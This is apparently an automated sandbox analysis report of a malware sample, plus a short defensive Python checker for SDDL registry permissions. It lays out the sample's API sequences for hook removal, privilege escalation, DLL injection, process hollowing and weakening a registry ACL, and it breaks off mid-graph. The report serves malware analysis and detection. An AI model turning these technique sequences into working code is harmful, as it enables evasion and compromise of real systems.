                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: e9bfcbbcd138b4d7dd4df6a8df15003861a828a91160f34df5af8163ee159cdb
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: CF91F27270267485F7689FA594603ED6BA4FF69B9CF14411BDE3A676A5CB34C8C2C300
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: f8671f7ddd9d3151e8de402689eb3f6df7e55b31f66172980a505d12df263d65
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: 7D71B532203BA186E72DDFAA98A43EE6790F7AAB88F440017DD39537E9DE34C545C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: 3343cf5fbf8b8897b8f77685b865c3ec09019879f5b34131eea1c4abd1601fac
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: 7D618B37A05B949AEB28CFA5D4943DD77A0F368B8CF044256EF6917BA8DB38D485C700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: d211cb8ea232f5b40925d724f767afdb1e4ce081fd21d7ae6c03d7f050daeb74
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: A151D636207BA181E7AC9AE5A4743EB6751F3AA788F440117DE7903BF9EE39C445C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: 8126520eb642e1b9832b80c5f14346f2032b3576af71cf94ab3f74053c8cc8bc
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: 1D613031927F688CD6679BB994712A56B5CBF723CDF41D307E93A72A71EB3990038200
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: d61fbb89930ff07a8261cd5928fdef88125afa4d0c86fb264f0195240b574bc3
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: AF41E472316A5482DB24DFA5E4543EE77A0FBA8798F404022EE6D877A8DB7CC481C740
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: 789cd6d13d63871bdedcaad1c698f3d27871a1fd1b1612e0793705990e2806fa
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: E3115E32216B9482EB258F25F410399B7E0FB99B88F584665DEAC07768DF3CC5558B00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 222ab89ede8730364fd66c3ff642a418130a976346cadb3df6bee7a3ea60d33d
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: E7E08671A42B44E0DF158F61E4902D833A0EB78B68F4C9123D97C0A321FB38D1E9C301
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: 54d69dd8e3a10fb69431f31c9e47045b6bc5fbeadc2ffc58a0b9a059ffa2de0d
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: 56E0E671A52B55D0DF158FA1E4901D87365F778B5CF889123D97C4A365EA38D1E5C300
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 0181d76f97bfe97161b40d018a0446171709d08f51e6ded7dfdac6a6ea59d863
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 6BD09E32622A95A5EE24EB84D8A93C96334F3B434DF944413D17D92975DF3DCA8BC740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                           • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFree
                                                          • String ID:
                                                          • API String ID: 756756679-0
                                                          • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction ID: 68f6b240d09a4260ed46950b8f3246e43bb54358201e6f6be1ed807fad0fc897
                                                          • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                          • Instruction Fuzzy Hash: B111C031B02BA481EB08CBA6A45829D67B0FB99FC4F584026EE6D93735DF38C4828300
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                           • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction ID: fc0b5895a8af778e0727726985035f15786a54d42cb3d98f322a79c5f6f51cb5
                                                          • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                          • Instruction Fuzzy Hash: F7E06DB160261486EB088FA2D82C38DB7F1FF98F0AF44C024C92907361DF7D84D99740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                           • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmp
                                                           • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocProcess
                                                          • String ID:
                                                          • API String ID: 1617791916-0
                                                          • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction ID: ef8c2f1ccf7478dc89855662bafe8fe2202e80e747ed3ba01202cbb3ad01aa9a
                                                          • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                          • Instruction Fuzzy Hash: C3E0EDB161255486EB089BA2D81829DB7B1FF98B1AF448025C92907325DE3884D99610
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.2208381080.00007FF6931B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6931B0000, based on PE: true
                                                           • Associated: 00000025.00000002.2208339786.00007FF6931B0000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2208420348.00007FF6931C8000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2208452028.00007FF6931CE000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2208745898.00007FF693449000.00000008.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2209078712.00007FF6936C0000.00000004.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2209188427.00007FF6936FC000.00000002.00000001.01000000.00000006.sdmp
                                                           • Associated: 00000025.00000002.2209285290.00007FF6936FF000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_37_2_7ff6931b0000_updater.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction ID: e2deca9108ee35f50872e246185b759c1399870366ac86f0bb851a426d63dc4a
                                                          • Opcode Fuzzy Hash: d18781531925d2824a96e72a8f9dc64733ec09c4f1669cefa822b9d5e06019eb
                                                          • Instruction Fuzzy Hash: 5CB01230D0430984E7142F11D8833583278EB08740F410471D40C67372CEBD54504B10

                                                          Execution Graph

                                                          Execution Coverage:41.9%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:47.4%
                                                          Total number of Nodes:247
                                                          Total number of Limit Nodes:29
                                                           execution_graph, rendered as per-function call sequences (addresses belong to the dllhost.exe image loaded at 0x140000000 in process 0000002D, whose function records follow; "->" is a graph edge, "[...]" expands a callee inline, "(N API calls)" is the report's own summary of a callee that was not expanded):

                                                           • 140002d40, image entry point:
                                                           - 140002a14, called twice (strings kernel32.dll and ntdll.dll): StrCpyW StrCatW GetModuleHandleW -> GetCurrentProcess K32GetModuleInformation -> CreateFileW -> CreateFileMappingW -> MapViewOfFile -> lstrcmpiA loop -> VirtualProtect VirtualProtect -> CloseHandle CloseHandle FreeLibrary. Mapping the on-disk copy of a system DLL beside the loaded one and then changing the loaded image's page protection is the sequence used to overwrite user-mode hooks with clean code; the copy itself is not an API call and so has no node here.
                                                           - GetCurrentProcessId OpenProcess -> OpenProcessToken -> LookupPrivilegeValueW (SeDebugPrivilege) -> AdjustTokenPrivileges -> GetLastError -> CloseHandle
                                                           - RegOpenKeyExW (SOFTWARE\dialerconfig) -> RegQueryValueExW -> RegQueryValueExW -> GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW -> RegQueryValueExW -> RegCloseKey GetCurrentProcessId; a failed open or query goes to ExitProcess (140002d49)
                                                           - 14000200c [GetProcessHeap HeapAlloc -> 140001cf0 (GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses -> per process: OpenProcess -> K32EnumProcessModulesEx -> ReadProcessMemory loop -> CloseHandle; then GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap) -> loop: OpenProcess -> TerminateProcess CloseHandle -> GetProcessHeap HeapFree]
                                                           - RegCreateKeyExW -> ConvertStringSecurityDescriptorToSecurityDescriptorW -> RegSetKeySecurity LocalFree -> RegCreateKeyExW -> GetCurrentProcessId RegSetValueExW RegCloseKey -> RegCloseKey. The only SDDL string in this function's string list is D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), which grants GENERIC_ALL to Authenticated Users as well as to Administrators.
                                                           - CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread -> 140001514 (50 API calls) -> ShellExecuteW (self-loop) -> 14000148c (6 API calls) and 1400011d4 (GetProcessHeap HeapFree GetProcessHeap HeapFree), four times each -> GetProcessHeap HeapFree SleepEx -> ExitProcess

                                                           • 140002cb8, named-pipe server thread, read only: 140002300 [AllocateAndInitializeSid -> SetEntriesInAclW -> LocalAlloc -> InitializeSecurityDescriptor -> SetSecurityDescriptorDacl -> CreateNamedPipeW], retried with Sleep until the pipe exists; then loop: ConnectNamedPipe -> ReadFile -> DisconnectNamedPipe (a failed connect sleeps and then disconnects)

                                                           • 1400036fc, named-pipe server thread, request/response: the same 140002300 pipe setup; then loop: ConnectNamedPipe -> ReadFile -> WriteFile -> DisconnectNamedPipe

                                                           • 14000363c, process-watcher thread: GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc -> loop: K32EnumProcesses -> for each PID 140003198 -> 140001860 (31 API calls, below) -> Sleep

                                                           • 140001860, per-process injector (31 API calls; strings MSBuild.exe, MsMpEng.exe, dialer.exe, ReflectiveDllMain): OpenProcess -> IsWow64Process -> CloseHandle -> OpenProcess -> OpenProcess -> K32GetModuleFileNameExW -> PathFindFileNameW lstrlenW -> StrCpyW -> CloseHandle -> StrCmpIW loop over the name list -> NtQueryInformationProcess -> OpenProcessToken -> GetTokenInformation -> GetLastError -> LocalAlloc -> GetTokenInformation -> GetSidSubAuthorityCount GetSidSubAuthority -> LocalFree -> CloseHandle -> StrStrA loop -> VirtualAllocEx -> WriteProcessMemory -> 140002c04 [GetModuleHandleA -> GetProcAddress] -> WaitForSingleObject -> GetExitCodeThread -> VirtualFreeEx -> CloseHandle -> CloseHandle. WaitForSingleObject and GetExitCodeThread act on a thread handle that no named API in this graph creates, consistent with a thread-creation routine resolved through GetProcAddress in 140002c04.

                                                           • 1400031d8, pipe command handler, branching on the data read from the pipe:
                                                           - 140003234 ReadFile -> 140001860 (31 API calls) -> 140001860 (31 API calls)
                                                           - RegOpenKeyExW -> RegDeleteValueW RegDeleteValueW RegDeleteValueW -> 14000217c [SysAllocString SysAllocString CoInitializeEx -> CoInitializeSecurity -> CoCreateInstance -> VariantInit -> CoUninitialize -> SysFreeString SysFreeString] -> 14000217c again (9 API calls) -> 140001f7c [GetProcessHeap HeapAlloc -> 140001cf0 (13 API calls) -> 140001eec (5 API calls) loop -> GetProcessHeap HeapFree]
                                                           - GetProcessHeap HeapAlloc K32EnumProcesses -> 140001860 (31 API calls) per process
                                                           - 14000356d ReadFile -> GetProcessHeap HeapAlloc -> 140001cf0 (13 API calls) -> 140001eec [OpenProcess -> 140002c04 (2 API calls) -> CloseHandle CloseHandle] -> 140003612 GetProcessHeap HeapFree
                                                           - 140003563 -> 140001f7c (22 API calls)
                                                           - 1400020fc [ReadFile loop] -> 14000346b ReadFile -> GetProcessHeap HeapAlloc ReadFile -> 140002434 (process hollowing, below)
                                                           - 140002c64 -> 1400020cc (2 API calls)
                                                           - 1400020fc [ReadFile loop] -> 1400020fc [ReadFile loop] -> ShellExecuteW
                                                           - ExitProcess (140003356)
                                                           Every branch returns through 14000329d or through 140003612 GetProcessHeap HeapFree.

                                                           • 140002434, process hollowing, reached from the pipe handler: CreateProcessW (the later ResumeThread implies the process is created suspended) -> VirtualAllocEx -> WriteProcessMemory -> VirtualProtectEx, present as two parallel chains and repeated through the dispatch block 1400024ab, which also issues further WriteProcessMemory and VirtualProtectEx calls and 1400020cc (GetModuleHandleA GetProcAddress); then either VirtualAlloc -> GetThreadContext -> WriteProcessMemory -> SetThreadContext or VirtualAlloc -> Wow64GetThreadContext -> WriteProcessMemory -> Wow64SetThreadContext -> ResumeThread. The failure path is OpenProcess -> TerminateProcess on the new process. Returns through 14000291b to 140003612 GetProcessHeap HeapFree.

                                                          Callgraph

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000002D.00000002.2250681771.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                           • Associated: 0000002D.00000002.2250629569.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250730274.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                           • Associated: 0000002D.00000002.2250756472.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_45_2_140000000_dllhost.jbxd
                                                          Similarity
                                                          • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                          • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\dialerconfig$SeDebugPrivilege$dialerdll32$dialerdll64$kernel32.dll$ntdll.dll$open$pid$svc64
                                                          • API String ID: 3658652915-98388624
                                                          • Opcode ID: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                          • Instruction ID: 64b8ffd44a99f3ce8fcd0b7b346b5b7659867d38c7c320bcd7049fd2825a730f
                                                          • Opcode Fuzzy Hash: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                          • Instruction Fuzzy Hash: C6C1F2F2200A4186EB26DF22F8547DA37A5F78CBD9F814116BB4A43A75DF38C589C744
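The string D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) in this function's string list is an SDDL descriptor with two access-allowed ACEs, both object- and container-inheritable (OI, CI), granting GENERIC_ALL (GA) to Authenticated Users (AU) and to Administrators (BA); applied through RegSetKeySecurity, it makes the key under SOFTWARE\dialerconfig writable by any logged-on user. As an added example (not part of the report), the Python below parses the DACL portion of an SDDL string and flags allow-ACEs that give a broad principal write access. The right and SID abbreviations are standard SDDL; the "broad principal" set and the registry write mask are this example's own policy choices.

```python
"""Inspect the DACL of an SDDL string for write grants to broad principals.

Added example for the descriptor D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA) that the dllhost
image passes to ConvertStringSecurityDescriptorToSecurityDescriptorW / RegSetKeySecurity.
Token tables are standard SDDL; BROAD_TRUSTEES and KEY_WRITE_BITS are this example's policy."""
import re

# SDDL access-right tokens and their ACCESS_MASK values (generic, standard and registry subset).
RIGHT_MASKS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "SD": 0x00010000, "RC": 0x00020000, "WD": 0x00040000, "WO": 0x00080000,
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    "KA": 0x000F003F, "KR": 0x00020019, "KW": 0x00020006, "KX": 0x00020019,
}
# Bits that let the holder change a registry key or its security (policy choice).
KEY_WRITE_BITS = (0x2 | 0x4 | 0x20                      # KEY_SET_VALUE, KEY_CREATE_SUB_KEY, KEY_CREATE_LINK
                  | 0x00010000 | 0x00040000 | 0x00080000  # DELETE, WRITE_DAC, WRITE_OWNER
                  | 0x10000000 | 0x40000000)            # GENERIC_ALL, GENERIC_WRITE
TRUSTEES = {"AU": "Authenticated Users", "WD": "Everyone", "BU": "Users", "IU": "Interactive",
            "AN": "Anonymous", "BG": "Guests", "BA": "Administrators", "SY": "SYSTEM",
            "CO": "Creator Owner"}
# Well-known SIDs that amount to "any logged-on user" (policy choice for this example).
BROAD_TRUSTEES = {"AU", "WD", "BU", "IU", "AN", "BG"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_mask(rights):
    """Convert an SDDL rights field ("GA", "KRKW", "0x20019") to an ACCESS_MASK."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        token = rights[i:i + 2]
        if token not in RIGHT_MASKS:
            raise ValueError("unknown SDDL right %r" % token)
        mask |= RIGHT_MASKS[token]
    return mask


def parse_sddl_dacl(sddl):
    """Return the ACEs of the first D: section as dicts; O:, G: and S: sections are ignored."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        raise ValueError("no DACL in SDDL string")
    aces = []
    for body in ACE_RE.findall(m.group(2)):
        fields = body.split(";")
        if len(fields) < 6:
            raise ValueError("malformed ACE %r" % body)
        ace_type, flags, rights, _obj, _inherit_obj, trustee = fields[:6]
        aces.append({
            "type": ace_type,
            "flags": [flags[i:i + 2] for i in range(0, len(flags), 2)],
            "rights": rights,
            "mask": rights_mask(rights),
            "trustee": trustee,
        })
    return aces


def find_broad_write_grants(sddl):
    """List (trustee name, rights) for allow-ACEs that give a broad principal write access."""
    findings = []
    for ace in parse_sddl_dacl(sddl):
        if ace["type"] != "A":          # only access-allowed ACEs grant anything
            continue
        if ace["trustee"] in BROAD_TRUSTEES and ace["mask"] & KEY_WRITE_BITS:
            findings.append((TRUSTEES.get(ace["trustee"], ace["trustee"]), ace["rights"]))
    return findings


if __name__ == "__main__":
    for desc in ("D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)",    # descriptor from the report
                 "D:(A;OICI;KR;;;AU)(A;OICI;KA;;;BA)"):   # constructed least-privilege variant
        print(desc, "->", find_broad_write_grants(desc) or "no broad write grants")
```

For the report's descriptor the result is a single finding, Authenticated Users with GA; the constructed variant that gives Authenticated Users KEY_READ and reserves KEY_ALL_ACCESS for Administrators produces none. Deny ACEs are skipped because they only remove access, and hex rights fields are accepted because tools such as icacls and the registry editor sometimes emit them instead of the two-letter tokens.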

                                                          Control-flow Graph

                                                           control_flow_graph of 140001860, one basic block per line as start-end address, the APIs it calls, then its successors ("|" separates the two outcomes of a branch; "return" is the exit block 140001cd0-140001cec, "cleanup" the CloseHandle block 140001cc7-140001cca that falls through to it):
                                                           140001860-1400018a2 OpenProcess -> 1400018a8 | return
                                                           1400018a8-1400018bd IsWow64Process -> 1400018bf | 1400018cd
                                                           1400018bf-1400018cb and 1400018cd -> 1400018d3
                                                           1400018d3-1400018df CloseHandle -> 1400018e5 | return
                                                           1400018e5-1400018f0 -> 1400018f6 | return
                                                           1400018f6-14000190b -> 14000190d | 14000191d
                                                           14000190d-140001912 -> 140001918 | return
                                                           140001918-14000191b and 14000191d -> 14000191f
                                                           14000191f-140001921 -> 140001927 | return
                                                           140001927-14000193d OpenProcess -> 140001943 | return
                                                           140001943-14000195c OpenProcess -> 14000195e | 1400019b0
                                                           14000195e-140001975 K32GetModuleFileNameExW -> 140001977 | 1400019a7
                                                           140001977-140001992 PathFindFileNameW lstrlenW -> 140001994 | 1400019a7
